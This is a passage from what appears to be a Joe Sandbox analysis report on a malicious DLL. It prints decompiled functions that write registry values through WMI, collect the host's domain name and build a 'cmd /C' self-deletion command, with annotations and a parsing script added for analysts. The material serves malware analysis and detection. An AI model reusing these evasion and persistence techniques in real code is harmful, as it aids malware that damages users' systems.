/* 0x048912c7 */					 *((intOrPtr*)( *_t61 + 8))(_t61);
/* 0x048912c7 */				}
/* 0x048912d0 */				return _t106;
			}

                                          APIs
                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052489D8,04893C2E,?,?,?,?,?,?,?,?,?,?,?,04893C2E), ref: 0489122F
                                          • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,052489D8,04893C2E,?,?,?,?,?,?,?,04893C2E,00000000,00000000,00000000,006D0063), ref: 0489126D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: QueryServiceUnknown_
                                          • String ID:
                                          • API String ID: 2042360610-0
                                          • Opcode ID: e5e621ab1bae4bf758b05d9581388b3d53051ae0893c0b94a318ad4707573fce
                                          • Instruction ID: cc434f5dfbd02df1e8ab06f249b1824d4575f8d2785fec32c8cb652a04b8dd8a
                                          • Opcode Fuzzy Hash: e5e621ab1bae4bf758b05d9581388b3d53051ae0893c0b94a318ad4707573fce
                                          • Instruction Fuzzy Hash: 17514575A00619AFDB04DFE8C888DAEB7F9FF48704B088A59E915EB250D770AD05CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			// Editor's annotation, not part of the report: the vtable-offset calls below line up with the
                                          			// WMI interfaces IWbemClassObject (0x4c = GetMethod, 0x14 = Put, 0x10 = Get) and IWbemServices
                                          			// (0x60 = ExecMethod); 0x08 is IUnknown::Release on either. The object path at 0x489b1fc starts
                                          			// with the wide characters "St" (0x740053); reading it as the WMI registry provider "StdRegProv"
                                          			// is an inference that matches the report's "Writes registry values via WMI" signature, but only
                                          			// those two characters are visible on this page.
                                          			E048969D2(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				// _a4: context block, [0] = IWbemServices*, [4] = IWbemClassObject* (class definition)
                                          				// _a16: method name; _a24: parameter name; _a28: VARIANT*, input when non-empty, output otherwise
                                          				void* _v8;           // IWbemClassObject* holding the method's in-parameter signature
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;             // reused below to receive the ExecMethod out-parameter object
                                          				// IWbemClassObject::GetMethod(wszName=_a16, lFlags=0, ppInSignature=&_v8, ppOutSignature=NULL)
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				// fills the in-parameter object from _a8/_a12/_a20 and hands back two BSTRs through &_a20/&_a12
                                          				// (its SysAllocString/SysFreeString calls are the subcall entries in the API list below)
                                          				_t40 = E04891000(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {        // caller's VARIANT has vt != VT_EMPTY: pass it as input
                                          						_t52 = _v8;
                                          						// IWbemClassObject::Put(wszName=_a24, lFlags=0, pVal=_t61, Type=0)
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x489a348; // 0x9ad5a8 (runtime delta added to image addresses; the string/GUID table lives outside the mapped image, around 0x0524xxxx)
                                          						_t20 = _t68 + 0x489b1fc; // 0x740053 = L"St..." (object path, see annotation above)
                                          						// IWbemServices::ExecMethod(strObjectPath=_t20, strMethodName=_a16, lFlags=0, pCtx=NULL,
                                          						//                           pInParams=_v8, ppOutParams=&_a4, ppCallResult=NULL)
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E04892898(_a4);           // inspects the out-parameter object; its body is not on this page
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {   // caller's VARIANT was empty: read the result back into it
                                          									_t50 = _a4;
                                          									// IWbemClassObject::Get(wszName=_a24, lFlags=0, pVal=_t65, pType=NULL, plFlavor=NULL)
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);   // IUnknown::Release on the out-parameter object
                                          						}
                                          						_t57 = __imp__#6;                         // OLEAUT32 ordinal 6 = SysFreeString (matches the API list)
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);           // IUnknown::Release on the in-parameter signature
                                          				goto L18;
                                          			}
                                          
                                          Instruction addresses of the decompiled lines: 0x048969d8 0x048969db 0x048969eb 0x048969f4 0x048969f8 0x04896ac6 0x04896acc 0x04896acc 0x04896a12 0x04896a17 0x04896a1b 0x04896a21 0x04896a26 0x04896a2d 0x04896a3c 0x04896a3c 0x04896a40 0x04896a42 0x04896a4e 0x04896a59 0x04896a64 0x04896a68 0x04896a72 0x04896a76 0x04896a78 0x04896a7d 0x04896a84 0x04896a94 0x04896a94 0x04896a7d 0x04896a76 0x04896a96 0x04896a9b 0x04896aa0 0x04896aa0 0x04896aa3 0x04896aac 0x04896ab1 0x04896ab1 0x04896ab6 0x04896abb 0x04896abb 0x04896ab6 0x04896a40 0x04896abd 0x04896ac3 0x00000000

                                          APIs
                                            • Part of subcall function 04891000: SysAllocString.OLEAUT32(80000002), ref: 0489105D
                                            • Part of subcall function 04891000: SysFreeString.OLEAUT32(00000000), ref: 048910C3
                                          • SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          • SysFreeString.OLEAUT32(04896ECE), ref: 04896ABB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 28cd1ef51bf25f0e93d98f256b5c83a49fd19ec374efa563293856535c7120e5
                                          • Instruction ID: 2cc46c82d856a0f986a4c0e13a01c1bf9016c1a6197f16d84690f81332dc2aaf
                                          • Opcode Fuzzy Hash: 28cd1ef51bf25f0e93d98f256b5c83a49fd19ec374efa563293856535c7120e5
                                          • Instruction Fuzzy Hash: 6F311C71500515AFCF11DF68C988C9BBBF9FFC97407188A58F815EB210E671ADA1CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			// Editor's annotation, not part of the report: every call below goes through a COM vtable.
                                          			// Both QueryInterface calls resolve to RPCRT4!IUnknown_QueryInterface_Proxy (see the API list),
                                          			// so the objects are RPC proxies for interfaces that live in another process or apartment.
                                          			// Only the first DWORD of each IID is visible: 0x00020400 equals the Data1 of IID_IDispatch
                                          			// (an inference from four bytes); 0xE7A1AF80 and 0xA4C6892C are not identified here.
                                          			E04896615(intOrPtr* __eax, intOrPtr _a4) {
                                          				void* _v8;           // result of the second QueryInterface
                                          				void* _v12;          // result of the first QueryInterface
                                          				void* _v16;          // object returned by the slot-0x3c call
                                          				intOrPtr* _t22;
                                          				void* _t23;
                                          				intOrPtr* _t24;
                                          				intOrPtr* _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr* _t30;
                                          				void* _t31;
                                          				intOrPtr* _t32;
                                          				intOrPtr _t42;
                                          				intOrPtr _t45;
                                          				intOrPtr _t48;
                                          				void* _t51;
                                          
                                          				_push( &_v16);
                                          				_t42 =  *0x489a348; // 0x9ad5a8 (runtime delta to the string/GUID table outside the mapped image)
                                          				_t2 = _t42 + 0x489b470; // 0x20400 = first DWORD of a GUID
                                          				_push(0);
                                          				_push(__eax);
                                          				// slot 0x3c (method index 15) on the caller's object; the decompiler shows the pushes but not the
                                          				// argument list (quality 50%), so the method cannot be identified from this page
                                          				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                          				if(_t51 >= 0) {
                                          					_t22 = _v16;
                                          					_t45 =  *0x489a348; // 0x9ad5a8
                                          					_t6 = _t45 + 0x489b490; // 0xe7a1af80 = first DWORD of an IID
                                          					// slot 0 = IUnknown::QueryInterface(riid=_t6, ppv=&_v12), logged as IUnknown_QueryInterface_Proxy
                                          					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                          					_t51 = _t23;
                                          					if(_t51 >= 0) {
                                          						_t26 = _v12;
                                          						// slot 0x1c (method index 7): on a dual interface this is the first method after IDispatch; not identifiable here
                                          						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                          						if(_t51 >= 0) {
                                          							_t48 =  *0x489a348; // 0x9ad5a8
                                          							_t30 = _v8;
                                          							_t12 = _t48 + 0x489b480; // 0xa4c6892c = first DWORD of an IID
                                          							// slot 0 = IUnknown::QueryInterface(riid=_t12, ppv=_a4); the caller receives this interface
                                          							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                          							_t51 = _t31;
                                          							_t32 = _v8;
                                          							 *((intOrPtr*)( *_t32 + 8))(_t32);   // IUnknown::Release
                                          						}
                                          						_t28 = _v12;
                                          						 *((intOrPtr*)( *_t28 + 8))(_t28);       // IUnknown::Release
                                          					}
                                          					_t24 = _v16;
                                          					 *((intOrPtr*)( *_t24 + 8))(_t24);           // IUnknown::Release
                                          				}
                                          				return _t51;
                                          			}
                                          
                                          Instruction addresses of the decompiled lines: 0x04896621 0x04896622 0x04896628 0x0489662f 0x04896631 0x04896635 0x04896639 0x0489663b 0x04896644 0x0489664a 0x04896652 0x04896654 0x04896658 0x0489665a 0x04896667 0x0489666b 0x04896670 0x04896676 0x0489667b 0x04896683 0x04896685 0x04896687 0x0489668d 0x0489668d 0x04896690 0x04896696 0x04896696 0x04896699 0x0489669f 0x0489669f 0x048966a6

                                          APIs
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04896652
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04896683
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Interface_ProxyQueryUnknown_
                                          • String ID:
                                          • API String ID: 2522245112-0
                                          • Opcode ID: e30c42d754b098e50ac3d9d7383325e53738df6fa0eb8628ad7c466284688b3a
                                          • Instruction ID: 56dade4458782443f4be198f8a62954aef2cbd4bdb226849bd503e55816386be
                                          • Opcode Fuzzy Hash: e30c42d754b098e50ac3d9d7383325e53738df6fa0eb8628ad7c466284688b3a
                                          • Instruction Fuzzy Hash: 652103B5A00619EFCB00DBA8C444D5AB7B9FFC9B14B188A88E905EB314D671FD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000,?), ref: 00B71BEA
                                          • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,?,00000104,00000000), ref: 00B71C31
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                          • String ID:
                                          • API String ID: 552344955-0
                                          • Opcode ID: 742d3658404c407b9cbfa84870f14d0cb2ee0e5158530858850e7e74dd903051
                                          • Instruction ID: d3fa3ca78ee141d7111adc00c072efec1b56502e29560db7da24a8d63ea4c5cd
                                          • Opcode Fuzzy Hash: 742d3658404c407b9cbfa84870f14d0cb2ee0e5158530858850e7e74dd903051
                                          • Instruction Fuzzy Hash: 81118671940208ABD7129BECC844BDEBBF9EF80755F2084D9E814AB200DB75DE45DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00B63344,69B25F44,?,?,00000000), ref: 00B67C5B
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00B63344), ref: 00B67CBC
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$FileFreeHeapSystem
                                          • String ID:
                                          • API String ID: 892271797-0
                                          • Opcode ID: 97a7f089c4336274774bec878589a609726a6e414a04d9e2f7731bf64afd5fc1
                                          • Instruction ID: 9255758eaa5ab6b7cb1a1dbecf54f8e243e1972c0118f5af349872a55f0a844f
                                          • Opcode Fuzzy Hash: 97a7f089c4336274774bec878589a609726a6e414a04d9e2f7731bf64afd5fc1
                                          • Instruction Fuzzy Hash: 2711E6B6900209EBDF01DBA4D949ADE77FCEB08305F100592A905E3150DF389A848B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 0489290B
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          • SafeArrayDestroy.OLEAUT32(?), ref: 0489295B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ArraySafe$CreateDestroyFreeString
                                          • String ID:
                                          • API String ID: 3098518882-0
                                          • Opcode ID: 8b766d6c8d93a4d5b1d0e3cce22d54d1471f98dced8f81178471873b8841aaca
                                          • Instruction ID: 96ee5c327cc745f1d83588a81fb6b6ab789c214bf50ba5963e08a7450cf6462d
                                          • Opcode Fuzzy Hash: 8b766d6c8d93a4d5b1d0e3cce22d54d1471f98dced8f81178471873b8841aaca
                                          • Instruction Fuzzy Hash: 68113071A00609BFDF01DFA8D804EEEB7B9EF08750F048555FA04E7160E674AE159B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(0489744C), ref: 04897900
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          • SysFreeString.OLEAUT32(00000000), ref: 04897941
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: c64f1a6832d58023791b963bbab1e7d7856710e46c4625a362cd653f53d97727
                                          • Instruction ID: 221d71f7c81d3165fba708329d4ccbbbf70219deea641c448274c8414ea85133
                                          • Opcode Fuzzy Hash: c64f1a6832d58023791b963bbab1e7d7856710e46c4625a362cd653f53d97727
                                          • Instruction Fuzzy Hash: 1C014F7551061ABFDF019FA9D804D9F7BB8EF48610B044526F908E6120E6349D15DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			// Editor's annotation, not part of the report: classic two-pass GetComputerNameExA with
                                          			// NameType 3 = ComputerNameDnsFullyQualified: size query with a NULL buffer, heap allocation,
                                          			// second call. E04894DF6/E04894C73 wrap RtlAllocateHeap/RtlFreeHeap (see the API list).
                                          			// Returns the heap-allocated FQDN string, or NULL on any failure.
                                          			E04891567(void* __ecx) {
                                          				signed int _v8;      // in/out size for GetComputerNameExA
                                          				signed int _t10;     // declaration missing in the decompiler output
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;      // import pointer to KERNEL32!GetComputerNameExA
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				// GetComputerNameExA(3, NULL, &size): fails with ERROR_MORE_DATA and stores the required size in _v8
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E04894DF6(_t10 + 1);          // one spare byte; the successful call reports the length without the NUL
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;   // explicit terminator at buffer[length]
                                          						} else {
                                          							E04894C73(_t20);               // free the buffer and report failure
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}
                                          
                                          Instruction addresses of the decompiled lines: 0x0489156c 0x04891577 0x04891579 0x0489157f 0x04891581 0x04891586 0x0489158f 0x04891593 0x0489159c 0x048915a0 0x048915af 0x048915a2 0x048915a3 0x048915a8 0x048915a8 0x048915a0 0x04891593 0x048915b8

                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,0489641B), ref: 0489157F
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,0489641B), ref: 0489159C
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 74f48d5ac0103123ed83e442e6a58e64e44b188588d1112366fd27328860056b
                                          • Instruction ID: 988c0dfe8e512aede09f20535ce8c662dd8219d6da911c7c7fe017c39bc46104
                                          • Opcode Fuzzy Hash: 74f48d5ac0103123ed83e442e6a58e64e44b188588d1112366fd27328860056b
                                          • Instruction Fuzzy Hash: 61F09626744506BBFF50DA998D04E9B26ECDBC1744F190655A901D3100EA70EE018661
                                          Uniqueness

                                          Uniqueness Score: -1.00%
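The function listings on this page follow a fixed text layout: an `APIs` list mixing direct calls with `Part of subcall function` entries, a `Memory Dump Source` line giving the region and image base, an `API ID`, and a `Uniqueness Score`. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout into records, separates the APIs a function calls itself from those it inherits through subcalls (useful when building a behaviour summary from a long report like this one), and decodes the 32-bit immediates the decompiler prints as `// 0x740053` or `// 0x6d0063` as the first two UTF-16LE characters of a wide string. The sample text is copied from two listings on this page (the SysFreeString listing of E048969D2 and the GetComputerNameExA listing of E04891567); the record fields and the `wide_prefix`/`immediate` helpers are this example's own.

```python
"""Parse Joe Sandbox per-function API listings into structured records.

Added example, not Joe Sandbox code. SAMPLE is constructed by copying two
listings from this report; the record layout is this script's own choice.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
  • Part of subcall function 04891000: SysAllocString.OLEAUT32(80000002), ref: 0489105D
  • Part of subcall function 04891000: SysFreeString.OLEAUT32(00000000), ref: 048910C3
• SysFreeString.OLEAUT32(?), ref: 04896AB1
• SysFreeString.OLEAUT32(04896ECE), ref: 04896ABB
Memory Dump Source
• Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
• API ID: String$Free$Alloc
Uniqueness Score: -1.00%

APIs
• GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,0489641B), ref: 0489157F
  • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
• GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,0489641B), ref: 0489159C
  • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
Memory Dump Source
• Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
• API ID: ComputerHeapName$AllocateFree
Uniqueness Score: -1.00%
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SOURCE_LINE = re.compile(r"^\s*•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")
API_ID_LINE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>\S+)")
UNIQ_LINE = re.compile(r"^\s*Uniqueness Score:\s*(?P<score>-?\d+(?:\.\d+)?)%")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]        # stack-slot snapshot as printed; "?" means unknown
    ref: int               # call-site address
    callee: Optional[int]  # address of the sub-function when the call is indirect


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    source_file: Optional[str] = None
    image_base: Optional[int] = None
    api_id: Optional[str] = None
    uniqueness: Optional[float] = None

    def direct_apis(self) -> List[str]:
        return [c.name for c in self.calls if c.callee is None]

    def subcall_apis(self) -> List[str]:
        return [c.name for c in self.calls if c.callee is not None]


def parse_blocks(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per 'APIs' header; lines of other kinds are ignored."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:
            continue
        elif m := API_LINE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            callee = int(m["callee"], 16) if m["callee"] else None
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), callee))
        elif m := SOURCE_LINE.match(line):
            cur.source_file, cur.image_base = m["file"], int(m["base"], 16)
        elif m := API_ID_LINE.match(line):
            cur.api_id = m["id"]
        elif m := UNIQ_LINE.match(line):
            cur.uniqueness = float(m["score"])
    return blocks


def immediate(arg: str) -> Optional[int]:
    """'00000003' -> 3; '?' or anything that is not plain hex -> None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg) else None


def wide_prefix(imm: int) -> Optional[str]:
    """Read a 32-bit immediate as the first two UTF-16LE characters of a wide
    string (0x43002f -> '/C'); None when they are not printable ASCII."""
    text = imm.to_bytes(4, "little").decode("utf-16-le")
    return text if all(0x20 <= ord(ch) < 0x7F for ch in text) else None
```

Run it on a whole report dump by reading the file into `parse_blocks`; `direct_apis()` is what to fingerprint on, since subcall entries repeat under every caller and inflate counts. `wide_prefix` only proves that a constant is a plausible string head: `0x740053` and `0x6d0063` decode to `St` and `cm`, while `0x20400` does not decode and is more likely the first DWORD of a GUID.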

                                          C-Code - Quality: 100%
                                          			// Editor's annotation, not part of the report: builds a command line from a wide format string
                                          			// whose first characters are "/C" (0x43002f), formatting in the integer 5 and the path in _a4, then
                                          			// hands it to E04893E6C together with a program name that starts "cm" (0x6d0063; the same value
                                          			// appears in the IUnknown_QueryService argument snapshot earlier on this page). Reading this as
                                          			// cmd.exe /C with a ping-based delay before deleting the file is an inference: it matches the
                                          			// report's "Self deletion via cmd delete" and "Uses ping.exe to sleep" signatures, but the full
                                          			// format string is not shown here.
                                          			E048975C6(WCHAR* _a4) {
                                          				void* __edi;
                                          				intOrPtr _t11;
                                          				intOrPtr _t14;
                                          				void* _t16;
                                          				void* _t18;
                                          				WCHAR* _t20;
                                          
                                          				// buffer for the formatted command line; _t7 is an undeclared decompiler residual
                                          				_t20 = E04894DF6(lstrlenW(_a4) + _t7 + 0x5c);
                                          				if(_t20 == 0) {
                                          					_t18 = 8;                      // ERROR_NOT_ENOUGH_MEMORY
                                          				} else {
                                          					_t11 =  *0x489a348; // 0x9ad5a8 (runtime delta to the string table outside the mapped image)
                                          					_t5 = _t11 + 0x489ba48; // 0x43002f = L"/C..." (format string)
                                          					wsprintfW(_t20, _t5, 5, _a4);  // the format consumes an integer (5) and the file path
                                          					_t14 =  *0x489a348; // 0x9ad5a8
                                          					_t6 = _t14 + 0x489b8f8; // 0x6d0063 = L"cm..." (program name)
                                          					_t16 = E04893E6C(0, _t6, _t20, 0); // executed; launches the command, body not on this page
                                          					_t18 = _t16;
                                          					E04894C73(_t20);               // RtlFreeHeap wrapper
                                          				}
                                          				return _t18;
                                          			}









                                          0x048975dc
                                          0x048975e0
                                          0x04897620
                                          0x048975e2
                                          0x048975e6
                                          0x048975ed
                                          0x048975f5
                                          0x048975fb
                                          0x04897606
                                          0x0489760f
                                          0x04897615
                                          0x04897617
                                          0x04897617
                                          0x04897625

                                          APIs
                                          • lstrlenW.KERNEL32(76DDF710,00000000,?,04892AC0,00000000,?,76DDF710,00000000,76DDF730), ref: 048975CC
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • wsprintfW.USER32 ref: 048975F5
                                            • Part of subcall function 04893E6C: memset.NTDLL ref: 04893E8F
                                            • Part of subcall function 04893E6C: GetLastError.KERNEL32 ref: 04893EDB
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
